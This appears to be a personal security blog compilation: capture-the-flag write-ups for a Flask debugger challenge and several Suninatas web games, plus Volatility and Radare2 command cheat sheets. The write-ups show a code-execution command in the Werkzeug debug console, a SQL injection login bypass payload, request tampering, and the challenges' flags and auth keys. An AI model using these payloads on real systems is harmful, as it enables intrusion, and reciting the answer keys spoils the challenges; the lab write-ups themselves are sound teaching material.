Hello Navi

Tech, Security & Personal Notes

Find a bug and trigger an exception in a Flask web application to access the debug console.

Vulnerability

Flask debug mode with DebuggedApplication and evalex=True allows interactive code execution through the debugger console. The calculator endpoint accepts division operations and lacks proper exception handling.

Solution

Step 1: Trigger an Exception

Send a division by zero request to the calculator:

1
https://9894a61910fb83f2.247ctf.com/calculator?number_1=1&number_2=0&operation=%2f

Step 2: Execute Arbitrary Python

The debug console opens. Execute commands to read the flag:

1
2
>>> __import__('os').popen('cat ./flag.txt').read()
'247CTF{0e310979093ef6309adcbcb418145200}\n'

Key Insight

Never enable Flask debug mode in production. The Werkzeug debugger with evalex=True provides a complete interactive Python console, allowing arbitrary code execution with the web server's privileges.

Flag

247CTF{0e310979093ef6309adcbcb418145200}

General Usage

Use -f to specify the memory image and -s for symbol directories if they are not in the default path.

1
2
3
4
5
6
7
# Basic syntax
vol -f <image> <plugin>

# Common flags
-f, --file <image> # Path to the memory dump
-s, --symbol-dirs <path> # Custom symbol tables directory (e.g., ~/ctf/symbolTables)
-o, --output-dir <path> # Directory to save dumped files

System Information

1
2
# Get basic OS information
vol -f image.vmem windows.info.Info

Processes & Activity

1
2
3
4
5
6
7
8
9
10
11
# List processes (EPROCESS list)
vol -f image.vmem windows.pslist.PsList

# Scan for hidden/terminated processes
vol -f image.vmem windows.psscan.PsScan

# Show process parent-child relationships
vol -f image.vmem windows.pstree.PsTree

# Show command line arguments for processes
vol -f image.vmem windows.cmdline.CmdLine

Network

1
2
# Scan for network connections and listening ports
vol -f image.vmem windows.netscan.NetScan

Files & Memory Dumping

1
2
3
4
5
6
7
8
9
10
11
12
# Scan for file objects in memory
vol -f image.vmem windows.filescan.FileScan | grep "filename"

# Dump files using various filters
vol -f image.vmem -o ./ windows.dumpfiles.DumpFiles --pid <PID>
vol -f image.vmem -o ./ windows.dumpfiles.DumpFiles --virtaddr <OFFSET>

# Dump process memory map
vol -f image.vmem -o ./ windows.memmap.Memmap --pid <PID> --dump

# Scan Master File Table (MFT)
vol -f image.vmem windows.mftscan.MFTScan

Useful Tips

1
2
3
4
5
# Combine with grep for quick searching
vol -f image.vmem windows.filescan.FileScan | grep -i "flag"

# Specify custom symbol path if needed
vol -s ~/ctf/symbolTables -f image.vmem windows.info.Info

A concise guide to common operations and tools within the Radare2 framework.


rax2 - Base Conversion

Used for converting between various numerical bases and formats.

Command Line

1
2
3
rax2 0x28       # Hex to decimal
rax2 40 # Decimal to hex
rax2 -h # Show help

Internal (within r2)

Use the ? command to evaluate expressions or convert values.

1
2
[0x00000000]> ? 0x28     # Convert 0x28 to all formats
[0x00000000]> ? 3+4 # Evaluate basic math

rabin2 - Binary Information

Extracts information from executable files (imports, exports, strings, etc.).

Common Commands

1
2
3
4
5
rabin2 -I file  # General binary info (arch, OS, bits, etc.)
rabin2 -z file # List strings in data sections
rabin2 -zz file # List strings in the entire binary
rabin2 -i file # List imports (linked libraries/functions)
rabin2 -e file # List entry points

radare2 (r2) - Core Interactive Tool

The main interface for disassembly, analysis, and debugging.

Startup

1
2
3
r2 -A file      # Open file and run analysis (aaa)
r2 -w file # Open file in write mode
r2 file # Open without any analysis

Information (i)

1
2
3
4
5
i               # Show information about current file
ii # Show information about current function
is # Show information about current symbol
iz # Show information about strings in data sections
iE # Show information about exports(global symbols)
1
2
3
s 0x400500      # Seek to specific address
s main # Seek to 'main' symbol
s - # Seek back to previous location

Analysis (a)

1
2
3
aa              # Basic analysis
aaa # Full analysis (including functions and symbols)
afl # List all analyzed functions

Disassembly & Printing (p)

1
2
3
4
5
pdf             # Print Disassembly of current Function
pdf @ main # Print Disassembly of specific function
pd 10 # Print 10 lines of Disassembly
pD 32 # Print 32 bytes of Disassembly
px 64 # Print 64 bytes of Hexdump

Writing (w)

Note: Requires opening r2 with -w.

1
2
wx 909090       # Write hex bytes (NOPs)
wa nop # Assemble and write a single instruction

Visual Modes (v, V)

1
2
3
4
5
6
7
v               # Open visual panels
V # Enter visual mode
VV # Enter visual graph mode
v test # Load saved layout 'test'
v= test # Save current layout as 'test'
p & P # Switch view
u & U # Undo and Redo seek

rasm2 - Assembler & Disassembler

Quickly assemble or disassemble instructions.

Usage

1
2
3
4
5
# Assemble an instruction (x86, 64-bit)
rasm2 -a x86 -b 64 "nop"

# Disassemble hex code (machine code)
rasm2 -a x86 -b 64 -d "90"

Useful Shortcuts (Internal)

  • ? - Show general help
  • V - Enter visual mode
  • VV - Enter visual graph mode
  • q - Exit current mode or r2

challenges

Game 01

Code Analysis

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<%
str = Request("str")

If not str = "" Then
result = Replace(str,"a","aad")
result = Replace(result,"i","in")
result1 = Mid(result,2,2)
result2 = Mid(result,4,6)
result = result1 & result2
Response.write result
If result = "admin" Then
pw = "????????"
End if
End if
%>
  1. Replace(str, "a", "aad"): Replaces every 'a' with 'aad'.
  2. Replace(result, "i", "in"): Replaces every 'i' with 'in'.
  3. Mid(result, 2, 2): Extracts 2 characters starting from the 2nd index.
  4. Mid(result, 4, 6): Extracts up to 6 characters starting from the 4th index.
  5. The goal is to make the final concatenated result equal to admin.

If we input ami: - a -> aad - i -> in - Intermediate result: aadmin - result1 = Mid("aadmin", 2, 2) = ad - result2 = Mid("aadmin", 4, 6) = min - result = ad + min = admin

ami

challenges

Game 02

Analysis

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<script>
function chk_form() {
var id = document.web02.id.value;
var pw = document.web02.pw.value;
if (id == pw) {
alert("You can't join! Try again");
document.web02.id.focus();
document.web02.id.value = "";
document.web02.pw.value = "";
} else {
document.web02.submit();
}
}
</script>
<!-- Hint : Join / id = pw -->
<!-- M@de by 2theT0P -->

The script prevents the form from being submitted if the id is equal to the pw. However, the hint explicitly states that for the Join challenge, we need id = pw.

Bypass

Intercept the request with a proxy (like Burp Suite or Zaproxy) or use the browser's Network tab to replay a modified request.

id=admin&pw=admin

challenges

Game 05

Concepts: JS Packer, JSObfuscator

Challenge Code

1
2
3
4
5
6
7
8
9
10
11
12
<input name="password" value="" style="width:180" />

<script>
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('g l=m o('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');p q(n){g h='';g j=r;s(g i=t;i>0;){i-=4;g k=(n>>i)&u;v(!j||k!=0){j=w;h+=l[k]}}x(h==''?'0':h)}',34,34,'||||||||||||||||var|result||start|digit|digitArray|new||Array|function|PASS|true|for|32|0xf|if|false|return'.split('|'),0,{}))
</script>

<script>
function init() {
document.frm.password.value = "";
document.frm.password.focus();
}
</script>

Deobfuscated Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
var digitArray = new Array(
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"a",
"b",
"c",
"d",
"e",
"f",
);

function PASS(n) {
var result = "";
var start = true;
for (var i = 32; i > 0; ) {
i -= 4;
var digit = (n >> i) & 0xf;
if (!start || digit != 0) {
start = false;
result += digitArray[digit];
}
}
return result == "" ? "0" : result;
}

Solution

Convert the hint using the PASS() function:

1
PASS(12342046413275659);

challenges

Game 04

Hint: Make your point to 50 & 'SuNiNaTaS'

Tool: ZAProxy

Initial Request

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST http://suninatas.com/challenge/web04/web04_ck.asp HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://suninatas.com
Connection: keep-alive
Referer: http://suninatas.com/challenge/web04/web04.asp
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ
Upgrade-Insecure-Requests: 1
Priority: u=0, i

total=0

Solution Steps

  1. Set fuzz location with numbers from 0 → 23
  2. Click plus in browser with the same cookie
  3. Receive alert: "I like the SuNiNaTaS browser!"
  4. Change User-Agent to include "SuNiNaTaS":
1
2
3
4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 SuNiNaTaS/147.0
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ

total=25
  1. Fuzz again until points reach 50 (avoid overflow)

Response

1
2
3
4
<td class="table_top">
<font size="2"><b>Auth key</b></font>
</td>
<td class="table_top">***********************</td>

challenges

Game 03

1
http://suninatas.com/board/notice/write
1q2w3e4r5t6y7u8i9o0p

challenges

Game 06

Vulnerability: SQL Injection

Attack Vector

1
2
select szPwd from T_Web13 where
nIdx = '3' and szPwd = '"&pwd&"'

Inject with 1' or '1' like '1:

1
2
select szPwd from T_Web13 where
nIdx = '3' and szPwd = '1' or '1' like '1'

This bypasses the password check by making the condition always true.

Success Response

1
2
3
4
Congratulation!!
auth_key is suninatastopofworld!

Now, you can read this article.

Next challenge URL: http://suninatas.com/challenge/web06/view.asp?idx=3&num=3&passcode=wkdrnlwnd

Hint form:

1
<form method="post" name="KEY_HINT" action="Rome's First Emperor"></form>
Augustus
+ + +
SYSTEM STATUS: ACTIVE ENCRYPTED SECTOR 7 PRTS_TERMINAL_V2.0 PROTOCOL: 0x2A ENCRYPTED DATA STREAM SYSTEM: ONLINE